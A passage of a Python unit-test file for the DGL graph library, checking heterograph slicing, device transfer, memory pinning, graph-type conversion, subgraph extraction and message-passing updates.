g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
g.edges['wishes'].data['e'] = F.ones((2, 4))
g.edges['wishes'].data['f'] = F.ones((2, 4))
fg = g['user', :, 'game'] # user--plays->game and user--wishes->game
assert len(fg.ntypes) == 2
assert fg.ntypes == ['user', 'game']
assert fg.etypes == ['plays+wishes']
assert fg.idtype == g.idtype
assert fg.device == g.device
etype = fg.etypes[0]
assert fg[etype] is not None # Issue #2166
assert F.array_equal(fg.nodes['user'].data['h'], F.ones((3, 5)))
assert F.array_equal(fg.nodes['game'].data['i'], F.ones((2, 5)))
assert F.array_equal(fg.edata['e'], F.ones((6, 4)))
assert 'f' not in fg.edata
etypes = F.asnumpy(fg.edata[dgl.ETYPE]).tolist()
eids = F.asnumpy(fg.edata[dgl.EID]).tolist()
assert set(zip(etypes, eids)) == set([(3, 0), (3, 1), (2, 1), (2, 0), (2, 3), (2, 2)])
check_mapping(g, fg)
fg = g['user', :, 'user']
assert fg.idtype == g.idtype
assert fg.device == g.device
# NOTE(gq): The node/edge types from the parent graph are returned if there is only one
# node/edge type. This differs from the behavior above.
assert fg.ntypes == ['user']
assert fg.etypes == ['follows']
u1, v1 = g.edges(etype='follows', order='eid')
u2, v2 = fg.edges(etype='follows', order='eid')
assert F.array_equal(u1, u2)
assert F.array_equal(v1, v2)
fg = g['developer', :, 'game']
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['developer', 'game']
assert fg.etypes == ['develops']
u1, v1 = g.edges(etype='develops', order='eid')
u2, v2 = fg.edges(etype='develops', order='eid')
assert F.array_equal(u1, u2)
assert F.array_equal(v1, v2)
fg = g[:, :, :]
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['developer+user', 'game+user']
assert fg.etypes == ['develops+follows+plays+wishes']
check_mapping(g, fg)
# Test another heterograph
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1, 2], [1, 2, 3]),
('user', 'knows', 'user'): ([0, 2], [2, 3])
}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.randn((4, 3))
g.edges['follows'].data['w'] = F.randn((3, 2))
g.nodes['user'].data['hh'] = F.randn((4, 5))
g.edges['knows'].data['ww'] = F.randn((2, 10))
fg = g['user', :, 'user']
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['user']
assert fg.etypes == ['follows+knows']
check_mapping(g, fg)
fg = g['user', :, :]
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['user']
assert fg.etypes == ['follows+knows']
check_mapping(g, fg)
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@parametrize_dtype
def test_to_device(idtype):
# TODO: rewrite this test case to accept different graphs so we
# can test reverse graph and batched graph
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
assert g.device == F.ctx()
g = g.to(F.cpu())
assert g.device == F.cpu()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
if F.is_cuda_available():
g1 = g.to(F.cuda())
assert g1.device == F.cuda()
assert F.context(g1.nodes['user'].data['h']) == F.cuda()
assert F.context(g1.nodes['game'].data['i']) == F.cuda()
assert F.context(g1.edges['plays'].data['e']) == F.cuda()
for ntype in g1.ntypes:
assert F.context(g1.batch_num_nodes(ntype)) == F.cuda()
for etype in g1.canonical_etypes:
assert F.context(g1.batch_num_edges(etype)) == F.cuda()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
with pytest.raises(DGLError):
g1.nodes['user'].data['h'] = F.copy_to(F.ones((3, 5)), F.cpu())
with pytest.raises(DGLError):
g1.edges['plays'].data['e'] = F.copy_to(F.ones((4, 4)), F.cpu())
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@parametrize_dtype
@pytest.mark.parametrize('g', get_cases(['block']))
def test_to_device2(g, idtype):
g = g.astype(idtype)
g = g.to(F.cpu())
assert g.device == F.cpu()
if F.is_cuda_available():
g1 = g.to(F.cuda())
assert g1.device == F.cuda()
assert g1.ntypes == g.ntypes
assert g1.etypes == g.etypes
assert g1.canonical_etypes == g.canonical_etypes
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@unittest.skipIf(dgl.backend.backend_name != "pytorch", reason="Pinning graph inplace only supported for PyTorch")
@parametrize_dtype
def test_pin_memory_(idtype):
# TODO: rewrite this test case to accept different graphs so we
# can test reverse graph and batched graph
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
g = g.to(F.cpu())
assert not g.is_pinned()
if F.is_cuda_available():
# unpin an unpinned CPU graph, directly return
g.unpin_memory_()
assert not g.is_pinned()
assert g.device == F.cpu()
# pin a CPU graph
g.pin_memory_()
assert g.is_pinned()
assert g.device == F.cpu()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
# it's fine to clone with new formats, but new graphs are not pinned
# >>> g.formats()
# {'created': ['coo'], 'not created': ['csr', 'csc']}
assert not g.formats('csc').is_pinned()
assert not g.formats('csr').is_pinned()
# 'coo' formats is already created and thus not cloned
assert g.formats('coo').is_pinned()
# pin a pinned graph, directly return
g.pin_memory_()
assert g.is_pinned()
assert g.device == F.cpu()
# unpin a pinned graph
g.unpin_memory_()
assert not g.is_pinned()
assert g.device == F.cpu()
g1 = g.to(F.cuda())
# unpin an unpinned GPU graph, directly return
g1.unpin_memory_()
assert not g1.is_pinned()
assert g1.device == F.cuda()
# error pinning a GPU graph
with pytest.raises(DGLError):
g1.pin_memory_()
@parametrize_dtype
def test_convert_bound(idtype):
def _test_bipartite_bound(data, card):
with pytest.raises(DGLError):
dgl.heterograph({
('_U', '_E', '_V'): data
}, {'_U': card[0], '_V': card[1]}, idtype=idtype, device=F.ctx())
def _test_graph_bound(data, card):
with pytest.raises(DGLError):
dgl.graph(data, num_nodes=card, idtype=idtype, device=F.ctx())
_test_bipartite_bound(([1, 2], [1, 2]), (2, 3))
_test_bipartite_bound(([0, 1], [1, 4]), (2, 3))
_test_graph_bound(([1, 3], [1, 2]), 3)
_test_graph_bound(([0, 1], [1, 3]), 3)
@parametrize_dtype
def test_convert(idtype):
hg = create_test_heterograph(idtype)
hs = []
for ntype in hg.ntypes:
h = F.randn((hg.number_of_nodes(ntype), 5))
hg.nodes[ntype].data['h'] = h
hs.append(h)
hg.nodes['user'].data['x'] = F.randn((3, 3))
ws = []
for etype in hg.canonical_etypes:
w = F.randn((hg.number_of_edges(etype), 5))
hg.edges[etype].data['w'] = w
ws.append(w)
hg.edges['plays'].data['x'] = F.randn((4, 3))
g = dgl.to_homogeneous(hg, ndata=['h'], edata=['w'])
assert g.idtype == idtype
assert g.device == hg.device
assert F.array_equal(F.cat(hs, dim=0), g.ndata['h'])
assert 'x' not in g.ndata
assert F.array_equal(F.cat(ws, dim=0), g.edata['w'])
assert 'x' not in g.edata
src, dst = g.all_edges(order='eid')
src = F.asnumpy(src)
dst = F.asnumpy(dst)
etype_id, eid = F.asnumpy(g.edata[dgl.ETYPE]), F.asnumpy(g.edata[dgl.EID])
ntype_id, nid = F.asnumpy(g.ndata[dgl.NTYPE]), F.asnumpy(g.ndata[dgl.NID])
for i in range(g.number_of_edges()):
srctype = hg.ntypes[ntype_id[src[i]]]
dsttype = hg.ntypes[ntype_id[dst[i]]]
etype = hg.etypes[etype_id[i]]
src_i, dst_i = hg.find_edges([eid[i]], (srctype, etype, dsttype))
# np.asscalar was removed in newer NumPy releases; .item() is the equivalent
assert F.asnumpy(src_i).item() == nid[src[i]]
assert F.asnumpy(dst_i).item() == nid[dst[i]]
mg = nx.MultiDiGraph([
('user', 'user', 'follows'),
('user', 'game', 'plays'),
('user', 'game', 'wishes'),
('developer', 'game', 'develops')])
for _mg in [None, mg]:
hg2 = dgl.to_heterogeneous(
g, hg.ntypes, hg.etypes,
ntype_field=dgl.NTYPE, etype_field=dgl.ETYPE, metagraph=_mg)
assert hg2.idtype == hg.idtype
assert hg2.device == hg.device
assert set(hg.ntypes) == set(hg2.ntypes)
assert set(hg.canonical_etypes) == set(hg2.canonical_etypes)
for ntype in hg.ntypes:
assert hg.number_of_nodes(ntype) == hg2.number_of_nodes(ntype)
assert F.array_equal(hg.nodes[ntype].data['h'], hg2.nodes[ntype].data['h'])
for canonical_etype in hg.canonical_etypes:
src, dst = hg.all_edges(etype=canonical_etype, order='eid')
src2, dst2 = hg2.all_edges(etype=canonical_etype, order='eid')
assert F.array_equal(src, src2)
assert F.array_equal(dst, dst2)
assert F.array_equal(hg.edges[canonical_etype].data['w'], hg2.edges[canonical_etype].data['w'])
# hetero_from_homo test case 2
g = dgl.graph(([0, 1, 2, 0], [2, 2, 3, 3]), idtype=idtype, device=F.ctx())
g.ndata[dgl.NTYPE] = F.tensor([0, 0, 1, 2])
g.edata[dgl.ETYPE] = F.tensor([0, 0, 1, 2])
hg = dgl.to_heterogeneous(g, ['l0', 'l1', 'l2'], ['e0', 'e1', 'e2'])
assert hg.idtype == idtype
assert hg.device == g.device
assert set(hg.canonical_etypes) == set(
[('l0', 'e0', 'l1'), ('l1', 'e1', 'l2'), ('l0', 'e2', 'l2')])
assert hg.number_of_nodes('l0') == 2
assert hg.number_of_nodes('l1') == 1
assert hg.number_of_nodes('l2') == 1
assert hg.number_of_edges('e0') == 2
assert hg.number_of_edges('e1') == 1
assert hg.number_of_edges('e2') == 1
assert F.array_equal(hg.ndata[dgl.NID]['l0'], F.tensor([0, 1], F.int64))
assert F.array_equal(hg.ndata[dgl.NID]['l1'], F.tensor([2], F.int64))
assert F.array_equal(hg.ndata[dgl.NID]['l2'], F.tensor([3], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l0', 'e0', 'l1')], F.tensor([0, 1], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l0', 'e2', 'l2')], F.tensor([3], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l1', 'e1', 'l2')], F.tensor([2], F.int64))
# hetero_from_homo test case 3
mg = nx.MultiDiGraph([
('user', 'movie', 'watches'),
('user', 'TV', 'watches')])
g = dgl.graph(((0, 0), (1, 2)), idtype=idtype, device=F.ctx())
g.ndata[dgl.NTYPE] = F.tensor([0, 1, 2])
g.edata[dgl.ETYPE] = F.tensor([0, 0])
for _mg in [None, mg]:
hg = dgl.to_heterogeneous(g, ['user', 'TV', 'movie'], ['watches'], metagraph=_mg)
assert hg.idtype == g.idtype
assert hg.device == g.device
assert set(hg.canonical_etypes) == set(
[('user', 'watches', 'movie'), ('user', 'watches', 'TV')])
assert hg.number_of_nodes('user') == 1
assert hg.number_of_nodes('TV') == 1
assert hg.number_of_nodes('movie') == 1
assert hg.number_of_edges(('user', 'watches', 'TV')) == 1
assert hg.number_of_edges(('user', 'watches', 'movie')) == 1
assert len(hg.etypes) == 2
# hetero_to_homo test case 2
hg = dgl.heterograph({
('_U', '_E', '_V'): ([0, 1], [0, 1])
}, {'_U': 2, '_V': 3}, idtype=idtype, device=F.ctx())
g = dgl.to_homogeneous(hg)
assert hg.idtype == g.idtype
assert hg.device == g.device
assert g.number_of_nodes() == 5
# hetero_to_subgraph_to_homo
hg = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1, 1, 2], [0, 0, 2, 1]),
('user', 'follows', 'user'): ([0, 1, 1], [1, 2, 2])
}, idtype=idtype, device=F.ctx())
hg.nodes['user'].data['h'] = F.copy_to(
F.tensor([[1, 0], [0, 1], [1, 1]], dtype=idtype), ctx=F.ctx())
sg = dgl.node_subgraph(hg, {'user': [1, 2]})
assert len(sg.ntypes) == 2
assert len(sg.etypes) == 2
assert sg.num_nodes('user') == 2
assert sg.num_nodes('game') == 0
g = dgl.to_homogeneous(sg, ndata=['h'])
assert 'h' in g.ndata.keys()
assert g.num_nodes() == 2
@unittest.skipIf(F._default_context_str == 'gpu', reason="Test on cpu is enough")
@parametrize_dtype
def test_to_homo_zero_nodes(idtype):
# Fix GitHub issue #2870
g = dgl.heterograph({
('A', 'AB', 'B'): (np.random.randint(0, 200, (1000,)), np.random.randint(0, 200, (1000,))),
('B', 'BA', 'A'): (np.random.randint(0, 200, (1000,)), np.random.randint(0, 200, (1000,))),
}, num_nodes_dict={'A': 200, 'B': 200, 'C': 0}, idtype=idtype)
g.nodes['A'].data['x'] = F.randn((200, 3))
g.nodes['B'].data['x'] = F.randn((200, 3))
gg = dgl.to_homogeneous(g, ['x'])
assert 'x' in gg.ndata
@parametrize_dtype
def test_to_homo2(idtype):
# test the result homogeneous graph has nodes and edges sorted by their types
hg = create_test_heterograph(idtype)
g = dgl.to_homogeneous(hg)
ntypes = F.asnumpy(g.ndata[dgl.NTYPE])
etypes = F.asnumpy(g.edata[dgl.ETYPE])
p = 0
for tid, ntype in enumerate(hg.ntypes):
num_nodes = hg.num_nodes(ntype)
for i in range(p, p + num_nodes):
assert ntypes[i] == tid
p += num_nodes
p = 0
for tid, etype in enumerate(hg.canonical_etypes):
num_edges = hg.num_edges(etype)
for i in range(p, p + num_edges):
assert etypes[i] == tid
p += num_edges
# test store_type=False
g = dgl.to_homogeneous(hg, store_type=False)
assert dgl.NTYPE not in g.ndata
assert dgl.ETYPE not in g.edata
# test return_count=True
g, ntype_count, etype_count = dgl.to_homogeneous(hg, return_count=True)
for i, count in enumerate(ntype_count):
assert count == hg.num_nodes(hg.ntypes[i])
for i, count in enumerate(etype_count):
assert count == hg.num_edges(hg.canonical_etypes[i])
@parametrize_dtype
def test_invertible_conversion(idtype):
# Test whether to_homogeneous and to_heterogeneous are invertible
hg = create_test_heterograph(idtype)
g = dgl.to_homogeneous(hg)
hg2 = dgl.to_heterogeneous(g, hg.ntypes, hg.etypes)
assert_is_identical_hetero(hg, hg2, True)
@parametrize_dtype
def test_metagraph_reachable(idtype):
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
g.nodes['user'].data['h'] = x
new_g = dgl.metapath_reachable_graph(g, ['follows', 'plays'])
assert new_g.idtype == idtype
assert new_g.ntypes == ['game', 'user']
assert new_g.number_of_edges() == 3
assert F.asnumpy(new_g.has_edges_between([0, 0, 1], [0, 1, 1])).all()
new_g = dgl.metapath_reachable_graph(g, ['follows'])
assert new_g.idtype == idtype
assert new_g.ntypes == ['user']
assert new_g.number_of_edges() == 2
assert F.asnumpy(new_g.has_edges_between([0, 1], [1, 2])).all()
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet doesn't support bool tensor")
@parametrize_dtype
def test_subgraph_mask(idtype):
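    # boolean-mask based node/edge selection should pick the same nodes and edges
    # as the explicit ID lists used in test_subgraph below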
g = create_test_heterograph(idtype)
g_graph = g['follows']
g_bipartite = g['plays']
x = F.randn((3, 5))
y = F.randn((2, 4))
g.nodes['user'].data['h'] = x
g.edges['follows'].data['h'] = y
def _check_subgraph(g, sg):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], idtype))
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], idtype))
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([1], idtype))
assert F.array_equal(F.tensor(sg.edges['wishes'].data[dgl.EID]),
F.tensor([1], idtype))
assert sg.number_of_nodes('developer') == 0
assert sg.number_of_edges('develops') == 0
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
sg1 = g.subgraph({'user': F.tensor([False, True, True], dtype=F.bool),
'game': F.tensor([True, False, False, False], dtype=F.bool)})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': F.tensor([False, True], dtype=F.bool),
'plays': F.tensor([False, True, False, False], dtype=F.bool),
'wishes': F.tensor([False, True], dtype=F.bool)})
_check_subgraph(g, sg2)
@parametrize_dtype
def test_subgraph(idtype):
g = create_test_heterograph(idtype)
g_graph = g['follows']
g_bipartite = g['plays']
x = F.randn((3, 5))
y = F.randn((2, 4))
g.nodes['user'].data['h'] = x
g.edges['follows'].data['h'] = y
def _check_subgraph(g, sg):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], g.idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], g.idtype))
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert F.array_equal(F.tensor(sg.edges['wishes'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert sg.number_of_nodes('developer') == 0
assert sg.number_of_edges('develops') == 0
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
sg1 = g.subgraph({'user': [1, 2], 'game': [0]})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': [1], 'plays': [1], 'wishes': [1]})
_check_subgraph(g, sg2)
# backend tensor input
sg1 = g.subgraph({'user': F.tensor([1, 2], dtype=idtype),
'game': F.tensor([0], dtype=idtype)})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': F.tensor([1], dtype=idtype),
'plays': F.tensor([1], dtype=idtype),
'wishes': F.tensor([1], dtype=idtype)})
_check_subgraph(g, sg2)
# numpy input
sg1 = g.subgraph({'user': np.array([1, 2]),
'game': np.array([0])})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': np.array([1]),
'plays': np.array([1]),
'wishes': np.array([1])})
_check_subgraph(g, sg2)
def _check_subgraph_single_ntype(g, sg, preserve_nodes=False):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
if not preserve_nodes:
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], g.idtype))
else:
for ntype in sg.ntypes:
assert g.number_of_nodes(ntype) == sg.number_of_nodes(ntype)
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], g.idtype))
if not preserve_nodes:
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
def _check_subgraph_single_etype(g, sg, preserve_nodes=False):
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
if not preserve_nodes:
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([0, 1], g.idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], g.idtype))
else:
for ntype in sg.ntypes:
assert g.number_of_nodes(ntype) == sg.number_of_nodes(ntype)
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([0, 1], g.idtype))
sg1_graph = g_graph.subgraph([1, 2])
_check_subgraph_single_ntype(g_graph, sg1_graph)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg1_graph = g_graph.edge_subgraph([1])
_check_subgraph_single_ntype(g_graph, sg1_graph)
sg1_graph = g_graph.edge_subgraph([1], relabel_nodes=False)
_check_subgraph_single_ntype(g_graph, sg1_graph, True)
sg2_bipartite = g_bipartite.edge_subgraph([0, 1])
_check_subgraph_single_etype(g_bipartite, sg2_bipartite)
sg2_bipartite = g_bipartite.edge_subgraph([0, 1], relabel_nodes=False)
_check_subgraph_single_etype(g_bipartite, sg2_bipartite, True)
def _check_typed_subgraph1(g, sg):
assert g.idtype == sg.idtype
assert g.device == sg.device
assert set(sg.ntypes) == {'user', 'game'}
assert set(sg.etypes) == {'follows', 'plays', 'wishes'}
for ntype in sg.ntypes:
assert sg.number_of_nodes(ntype) == g.number_of_nodes(ntype)
for etype in sg.etypes:
src_sg, dst_sg = sg.all_edges(etype=etype, order='eid')
src_g, dst_g = g.all_edges(etype=etype, order='eid')
assert F.array_equal(src_sg, src_g)
assert F.array_equal(dst_sg, dst_g)
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'])
g.nodes['user'].data['h'] = F.scatter_row(g.nodes['user'].data['h'], F.tensor([2]), F.randn((1, 5)))
g.edges['follows'].data['h'] = F.scatter_row(g.edges['follows'].data['h'], F.tensor([1]), F.randn((1, 4)))
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'])
def _check_typed_subgraph2(g, sg):
assert set(sg.ntypes) == {'developer', 'game'}
assert set(sg.etypes) == {'develops'}
for ntype in sg.ntypes:
assert sg.number_of_nodes(ntype) == g.number_of_nodes(ntype)
for etype in sg.etypes:
src_sg, dst_sg = sg.all_edges(etype=etype, order='eid')
src_g, dst_g = g.all_edges(etype=etype, order='eid')
assert F.array_equal(src_sg, src_g)
assert F.array_equal(dst_sg, dst_g)
sg3 = g.node_type_subgraph(['user', 'game'])
_check_typed_subgraph1(g, sg3)
sg4 = g.edge_type_subgraph(['develops'])
_check_typed_subgraph2(g, sg4)
sg5 = g.edge_type_subgraph(['follows', 'plays', 'wishes'])
_check_typed_subgraph1(g, sg5)
@parametrize_dtype
def test_apply(idtype):
def node_udf(nodes):
return {'h': nodes.data['h'] * 2}
def node_udf2(nodes):
return {'h': F.sum(nodes.data['h'], dim=1, keepdims=True)}
def edge_udf(edges):
return {'h': edges.data['h'] * 2 + edges.src['h']}
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.apply_nodes(node_udf, ntype='user')
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 5)) * 2)
g['plays'].edata['h'] = F.ones((4, 5))
g.apply_edges(edge_udf, etype=('user', 'plays', 'game'))
assert F.array_equal(g['plays'].edata['h'], F.ones((4, 5)) * 4)
# test apply on graph with only one type
g['follows'].apply_nodes(node_udf)
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 5)) * 4)
g['plays'].apply_edges(edge_udf)
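    # edata['h'] is 4 and the source user feature is 4 at this point, so 4 * 2 + 4 = 12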
assert F.array_equal(g['plays'].edata['h'], F.ones((4, 5)) * 12)
# Test the case that feature size changes
g.nodes['user'].data['h'] = F.ones((3, 5))
g.apply_nodes(node_udf2, ntype='user')
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 1)) * 5)
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.apply_nodes(node_udf)
with pytest.raises(DGLError):
g.apply_edges(edge_udf)
@parametrize_dtype
def test_level2(idtype):
#edges = {
# 'follows': ([0, 1], [1, 2]),
# 'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
# 'wishes': ([0, 2], [1, 0]),
# 'develops': ([0, 1], [0, 1]),
#}
g = create_test_heterograph(idtype)
def rfunc(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def rfunc2(nodes):
return {'y': F.max(nodes.mailbox['m'], 1)}
def mfunc(edges):
return {'m': edges.src['h']}
def afunc(nodes):
return {'y' : nodes.data['y'] + 1}
#############################################################
# send_and_recv
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.send_and_recv([2, 3], mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# only one type
g['plays'].send_and_recv([2, 3], mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.send_and_recv([2, 3], mfunc, rfunc)
g.nodes['game'].data.clear()
#############################################################
# pull
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.pull(1, mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# only one type
g['plays'].pull(1, mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# test fail case
with pytest.raises(DGLError):
g.pull(1, mfunc, rfunc)
g.nodes['game'].data.clear()
#############################################################
# update_all
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.update_all(mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[2., 2.], [2., 2.]]))
# only one type
g['plays'].update_all(mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[2., 2.], [2., 2.]]))
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.update_all(mfunc, rfunc)
# test multi
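    # per relation: 'plays' sums two unit user features per game -> [2, 2];
    # 'wishes' takes a max -> [1, 1]; summing across relations gives [3, 3]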
g.multi_update_all(
{'plays' : (mfunc, rfunc),
('user', 'wishes', 'game'): (mfunc, rfunc2)},
'sum')
assert F.array_equal(g.nodes['game'].data['y'], F.tensor([[3., 3.], [3., 3.]]))
# test multi
g.multi_update_all(
{'plays' : (mfunc, rfunc, afunc),
('user', 'wishes', 'game'): (mfunc, rfunc2)},
'sum', afunc)
assert F.array_equal(g.nodes['game'].data['y'], F.tensor([[5., 5.], [5., 5.]]))
# test cross reducer
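    # the multi_update_all result must match manually combining the per-relation
    # update_all outputs with the same reducer (plus the final afunc)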
g.nodes['user'].data['h'] = F.randn((3, 2))
for cred in ['sum', 'max', 'min', 'mean', 'stack']:
g.multi_update_all(
{'plays' : (mfunc, rfunc, afunc),
'wishes': (mfunc, rfunc2)},
cred, afunc)
y = g.nodes['game'].data['y']
g['plays'].update_all(mfunc, rfunc, afunc)
y1 = g.nodes['game'].data['y']
g['wishes'].update_all(mfunc, rfunc2)
y2 = g.nodes['game'].data['y']
if cred == 'stack':
# stack has an internal order by edge type id
yy = F.stack([y1, y2], 1)
yy = yy + 1 # final afunc
assert F.array_equal(y, yy)
else:
yy = get_redfn(cred)(F.stack([y1, y2], 0), 0)
yy = yy + 1 # final afunc
assert F.array_equal(y, yy)
# test fail case
# fail because cannot infer ntype
with pytest.raises(DGLError):
g.update_all(
{'plays' : (mfunc, rfunc),
'follows': (mfunc, rfunc2)},
'sum')
g.nodes['game'].data.clear()
@parametrize_dtype
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
def test_more_nnz(idtype):
g = dgl.graph(([0, 0, 0, 0, 0], [1, 1, 1, 1, 1]), idtype=idtype, device=F.ctx())
g.ndata['x'] = F.copy_to(F.ones((2, 5)), ctx=F.ctx())
g.update_all(fn.copy_u('x', 'm'), fn.sum('m', 'y'))
y = g.ndata['y']
ans = np.zeros((2, 5))
ans[1] = 5
ans = F.copy_to(F.tensor(ans, dtype=F.dtype(y)), ctx=F.ctx())
assert F.array_equal(y, ans)
@parametrize_dtype
def test_updates(idtype):
def msg_func(edges):
return {'m': edges.src['h']}
def reduce_func(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def apply_func(nodes):
return {'y': nodes.data['y'] * 2}
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
g.nodes['user'].data['h'] = x
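    # exercise every combination of builtin vs. UDF message/reduce functions,
    # with and without an apply function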
for msg, red, apply in itertools.product(
[fn.copy_u('h', 'm'), msg_func], [fn.sum('m', 'y'), reduce_func],
[None, apply_func]):
multiplier = 1 if apply is None else 2
g['user', 'plays', 'game'].update_all(msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], (x[0] + x[1]) * multiplier)
assert F.array_equal(y[1], (x[1] + x[2]) * multiplier)
del g.nodes['game'].data['y']
g['user', 'plays', 'game'].send_and_recv(([0, 1, 2], [0, 1, 1]), msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], x[0] * multiplier)
assert F.array_equal(y[1], (x[1] + x[2]) * multiplier)
del g.nodes['game'].data['y']
# pulls from destination (game) node 0
